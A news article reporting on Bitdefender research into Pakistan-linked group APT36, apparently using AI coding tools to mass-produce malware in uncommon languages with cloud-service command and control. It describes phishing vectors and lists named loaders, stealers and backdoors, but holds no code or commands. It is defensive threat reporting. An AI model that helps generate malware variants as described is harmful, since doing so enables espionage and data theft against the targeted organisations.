Pakistan-Linked Hackers Turn to AI to Produce Large Volumes of Malware
A cyber-espionage group believed to be aligned with Pakistan, commonly tracked as Transparent Tribe (APT36), has begun using artificial intelligence coding tools to accelerate the development of malware used in cyber attacks.
Security researchers report that the group is generating large numbers of malicious programs using AI-assisted development tools. Instead of building highly sophisticated malware, the attackers are producing many different variants quickly, hoping that some will bypass security defenses.
Researchers from Bitdefender say this approach allows attackers to create a large volume of disposable malware implants using programming languages that are not widely used in traditional malware development.
Attackers Using Less Common Programming Languages
One unusual element of the campaign is the use of lesser-known programming languages such as:
- Nim
- Zig
- Crystal
These languages are rarely used in typical malware operations, which often rely on more common languages like C++ or Python.
The attackers are also relying on legitimate online platforms for communication and data transfer. Services observed in the campaign include:
- Slack
- Discord
- Supabase
- Google Sheets
- Firebase
- Google Drive
Because these platforms are widely trusted and commonly used by organizations, malicious traffic may blend in with normal network activity, making detection more difficult.
AI Helping Lower the Barrier for Cybercrime
Large language models (LLMs) are believed to play a role in generating much of the code used in these attacks. These AI systems allow threat actors to quickly produce working code even in programming languages they may not normally know.
According to security researchers, attackers can use AI to:
- Write new malware from scratch
- Convert existing malware into other programming languages
- Rapidly produce multiple versions of the same tool
This capability reduces the technical skill required to create malware and allows attackers to scale operations faster.
A New Strategy: “Distributed Denial of Detection”
Bitdefender researchers describe this strategy as Distributed Denial of Detection (DDoD).
Instead of focusing on building advanced stealth malware, the attackers create a large number of different malware files. Each file may use different programming languages, communication protocols, or infrastructure.
The goal is simple: overwhelm security systems with many variants so that traditional detection methods struggle to keep up.
Targets: Governments, Embassies, and Businesses
The campaign appears to focus mainly on Indian government organizations and diplomatic missions located abroad.
Investigators also found evidence that the group has targeted:
- Afghan government institutions
- Private companies in the region
The attackers reportedly use LinkedIn to identify and research potential targets before launching phishing campaigns.
Phishing Emails Used to Start the Infection
Most of the attacks begin with phishing emails designed to trick victims into opening malicious files.
Common methods used include:
- ZIP archives containing Windows shortcut (LNK) files
- ISO disk images containing malware
- PDF documents that include a fake “Download Document” button
If a victim clicks the malicious file, it triggers hidden PowerShell commands that download and run malware directly in memory.
Malware Tools Used in the Campaign
Researchers identified several custom malware tools used by the group, including:
Warcode
A shellcode loader written in Crystal that loads a Havoc command-and-control agent directly into memory.
NimShellcodeLoader
A Nim-based loader used to deploy Cobalt Strike beacons.
CreepDropper
A .NET malware loader responsible for installing additional tools such as:
- SHEETCREEP – a Go-based information stealer using Microsoft Graph API
- MAILCREEP – a backdoor that communicates through Google Sheets
SupaServ
A Rust-based backdoor that communicates through the Supabase platform, with Firebase used as a backup channel.
LuminousStealer
An information-stealing malware written in Rust that uploads stolen files to Firebase and Google Drive.
CrystalShell and ZigShell
Cross-platform backdoors capable of running on Windows, Linux, and macOS, using platforms like Discord or Slack for command-and-control communication.
LuminousCookies
A specialized tool designed to steal browser data such as cookies, saved passwords, and payment information from Chromium-based browsers.
BackupSpy
A surveillance tool that monitors local files and removable drives for sensitive information.
ZigLoader
A loader that decrypts and executes shellcode directly in memory.
Gate Sentinel Beacon
A modified version of the GateSentinel command-and-control framework.
AI-Generated Malware May Be Less Stable
Although AI is helping attackers produce malware faster, researchers note that many of the samples show signs of instability and coding mistakes.
Security experts say the group appears to be relying more on volume than quality. Many of the tools contain logical errors or poor coding practices, suggesting they were generated quickly using automated tools.
The Bigger Cybersecurity Concern
While individual malware samples may not be highly sophisticated, the real danger lies in scale.
AI allows attackers to rapidly generate new malware variants and deploy them in large numbers. This makes it easier for threat actors to test many different approaches until one successfully bypasses security defenses.
Researchers warn that the combination of AI-generated malware, uncommon programming languages, and trusted cloud services could make future cyber attacks harder to detect.